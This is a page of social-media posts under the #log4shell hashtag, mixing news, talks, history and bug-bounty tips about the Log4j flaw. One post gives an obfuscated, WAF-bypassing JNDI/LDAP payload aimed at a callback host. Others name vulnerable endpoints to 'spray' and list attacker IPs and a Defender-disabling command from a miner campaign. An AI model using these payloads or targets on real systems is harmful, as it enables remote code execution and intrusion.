#log4shell search results
. @BountyOverflow Found a bypass working for a few WAF ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} Enjoy bounty season with #log4j #Log4Shell #log4jRCE #bugbountytip credits: @BountyOverflow
The #Log4Shell is "Not Dead" yet. It got 1st position in my methodology these days. Many organizations still use vulnerable #Log4J in their apps. So don't leave a single endpoint unchecked, scan everything. #BugBounty
Most orgs use #OpenSource without knowing what’s inside. When a zero-day vulnerability like #Log4Shell hits, that turns a bug into a crisis. 🎧 This #InfoQ #podcast unpacks the EU Cyber Resilience Act and its impact on open-source projects: bit.ly/48DNQqo #Security
In Dec 2021, the Log4Shell (CVE-2021-44228) vulnerability in Apache's Log4j shook the tech world, found by Alibaba Cloud's security team. Its ability to let attackers execute arbitrary code underscored the importance of up-to-date software. #Log4Shell
It's 2024, and a worrying trend is appearing on the Log4shell dashboard. In December, 25% of downloads of L4J were vulnerable to #log4shell - that number sits at 36% today and has been for a few weeks. We're going backwards.
UH OH SPICY GOT OFF HIS LAZY ASS AND FINALLY STARTED EDITING! Little sneak peek of the project I have going for YouTube, let me know what you think #infosec #cybersecurity #log4shell #Java #YouTube
⬇️ Cybersecurity in cloud environments ⬇️ - Log management. - Monitoring. - Attention to new vulnerabilities such as #Log4Shell: Patching! - Privilege management. 💡Find out more in the post on the @OVHcloud_ES blog: ovh.to/RLzqJFp #ciberseguridad #cloud #patrocinado
Watch this video with @TonyatESET and learn not just about the latest trends in #ransomware, but also about new statistics concerning #phishing and why the #Log4Shell vulnerability remains a problem. --------------- #WeLiveSecurity #ESET #WeekinSecurity
I used this docker image with the Minecraft #Log4shell demonstration during my lectures about #cyberattacks at the #gamefair2023 conference. Moreover, for the victim machine, I used @ReactOS with #Java and a #Minecraft server; it worked fine for a proof-of-concept attack with calc execution.
Two years ago the #Log4j (CVE-2021-44228) #vulnerability was present in many products, incl. #Minecraft. Recently, I prepared a #Docker image with a vulnerable Minecraft server for demonstration of the #Log4shell #exploit during my lectures malwarelab.eu/posts/log4shel… #Education #Java
An interesting (yet short) attack path that exploited #log4shell in @VMware #vRealize and harvested an #AWS Access Key to access an @elastic #logstash instance in AWS. This was buried among 1700 hosts, executed by NodeZero with no humans involved @Horizon3ai #Pentesting #infosec
Three years after #Log4Shell caused a significant security issue, we still struggle with insecure dependencies and injection problems, join @BrianVerm @vilojona @costlow @FrankDelporte for a lively #Java #OpenJDK and beyond discussion on Foojay! foojay.io/today/foojay-p…
I have a #Log4Shell payload on my GitHub Profile using a @ThinkstCanary Canary Token. Every once in a while I open my email and get a good chuckle 😂
#Log4Shell & #Spring4Shell proved that we need to keep our dependencies up-to-date From package managers to bots that can create changes on repositories, there are many tools. At #GOTOcph @MaritvanDijk77 will talk about keeping your dependencies in check gotocph.com/2023
Did you know Akamai denied over 2.5B #Log4j attack attempts in a single month? Akamai's @TonyLauro explains how #microsegmentation helped break the #Log4Shell kill chain. #SecureVibes #ZeroDay ow.ly/O2l450PHX7J
The persistent threat -- why major vulnerabilities like #Log4Shell and #Spring4Shell remain significant and super dangerous, by @brianverm @snyksec, #Java and beyond: foojay.io/today/the-pers… #foojaytip
Yesterday, when I applied my QR code magnets with the #EICAR #antivirus test string and the #Log4Shell PoC, the RVers holding a party across from me asked what the QR codes do. I said "they infect toll booth databases twenty years in the future."😈 I got a few laughs!
Currently infecting the I-80/90 toll road system with the #EICAR #antivirus test string and the #Log4Shell PoC string using my trusty QR code magnets! 😈
T-2 days until my summer RV journey begins with QR code magnets for the #EICAR #antivirus test string and the #Log4shell PoC! God help databases today & in the future as I go through weigh stations, toll booths, rest stops, truck stops, hi-tech traffic intersections… 😈
Tomorrow we'll take Indiana's I-80/90 toll route toward Chicago, displaying both the #EICAR #antivirus test string and the #Log4Shell PoC QR code magnets on the vehicle. Watch out, future DFIR aficionados!
The idea of "all features in a single jar" ended up with "all CVEs in a single jar". So even if you use just StringUtils.containsIgnoreCase, you still get impacted by a CVE-2025-48924 in ClassUtils. That is exactly the pattern that caused #log4shell: JNDI was included by default
Did you know the Log4Shell vulnerability started with a dad trying to fix his son's Minecraft game? 😱 #Log4Shell #OpenSource github.blog/open-source/in…
#Log4j could have failed many times. But it survived. Not because of money, but because of people. An honest look behind the scenes — from the first line of code to the project’s greatest crisis. Read Christian Grobmeier’s new piece: javapro.io/2025/06/10/the… #Log4Shell @TheASF
Armis reveals 2025’s top supply chain threats: AI-driven slopsquatting attacks, security flaws in AI-generated code, and major software supply chain breaches reshape the global cybersecurity landscape. #Slopsquatting #Log4Shell #VibeCoding ift.tt/NevoE8t
Prevent The Next #Log4Shell-A Call To Action "Open Source Economy is a new nonprofit organization formed by maintainers of several critical Java libraries to build a safer, stronger #Java ecosystem" On IProgrammer➡️ cutt.ly/xrVlMgpp @OS_Economy #jvm #opensdk #oss
Log4Shell was supposed to be a turning point. But nearly 4 years later, funding dropped, gov’t focus shifted, & developers were pulled into AI. New blog: How AI & politics stalled open-source security → bit.ly/3V5oyK5 #CyberSecurity #OpenSource #Log4Shell
"What if we had been on vacation?" #Log4Shell hit millions of systems in 2021; a few volunteers saved the net. Christian Grobmeier's look back at 30 years of #Log4j shows what #OpenSource can achieve & its limits when companies only consume! javapro.io/de/die-lange-g…
Millions lost. Servers hijacked. All because of overlooked code patterns, you might still have today. @vilojona reveals the unseen traps. Are you truly protected against SQLi, #Log4Shell & deserialization hacks? Decode it here: javapro.io/2025/04/29/top… #DevSecOps #SQLInjection
Ugh, is a new #log4shell coming? Keep an eye on CVE-2022-42889 (CVSS 9.8) redpacketsecurity.com/apache-commons… juejin.cn/post/713027639… cve.report/CVE-2022-42889
"POST /xxxx/token.oauth2" in certain endpoints found to be vulnerable to #Log4Shell (CVE-2021-44228). Just replace the username with your payload. Check below 👇tweet to verify the vulnerability. #BugBounty
Another Tip: I found this VMware vCenter #Log4Shell vulnerability in an endpoint using POST: /analytics/telemetry/ph/api/hyper/send?_c="${payload}". This RCE method is actually of CVE-2021-22005; however, this ep is vulnerable to Log4Shell as well. #BugBounty --> Bounty $2100.00.
I fell in love with #Log4Shell again; 4 P1s in a row. It's a simple recon and understanding where to spray the payload. This tweet is for you haters who made fun of my recent Log4Shell post. #BugBounty
Ox4Shell - Deobfuscate Log4Shell Payloads With Ease bit.ly/3cnwROs #Deobfuscation #Deobfuscator #Log4Shell #Ox4Shell #Oxeye
🔺 Mass exploitation of VMware Horizon via #Log4Shell (CVE-2021-44228) to install a miner. Attacker IP: 139.99.241.160 🇦🇺 LDAP: 135.125.146.221:1389 Miner: /150.129.234.203:82/add.bat "Set-MpPreference -DisableRealtimeMonitoring $true" IOCs: github.com/CronUp/Malware…
I found multiple instances of #Tableau CSP in the endpoint "/vizql/csp-report/" that are vulnerable to #Log4Shell (CVE-2021-44228). The response may depend on the targets - so test yourself. Here is the POST request if anyone wants to test: pastebin.com/es3Aidfr #BugBounty
Finally got my 5 months old #Log4Shell report triaged after a couple of "Need more infos" and "Not applicable", super excited🤪🤪😍😍. #BugBounty
NEW on #Log4Shell... Horde of miner bots and backdoors leveraged #Log4J to attack VMware Horizon servers 1/14
Today marks the 3-year anniversary of the #Log4Shell PoC going public 🧑🎄 I still remember going to sleep on the 9th with a PoC I couldn’t reproduce, only to wake up the next morning to all hell breaking loose and hundreds of RCEs everywhere. Would love to hear your stories! 💸
There have been over 840K attacks on companies globally, all exploiting the #Log4j (aka #Log4Shell) vulnerability. Learn more about this vulnerability: blck.by/34mUiTQ
We identified severe security issues within AWS #Log4Shell hot patch solutions. We provide a root cause analysis and overview of fixes and mitigations. bit.ly/3EqPbjd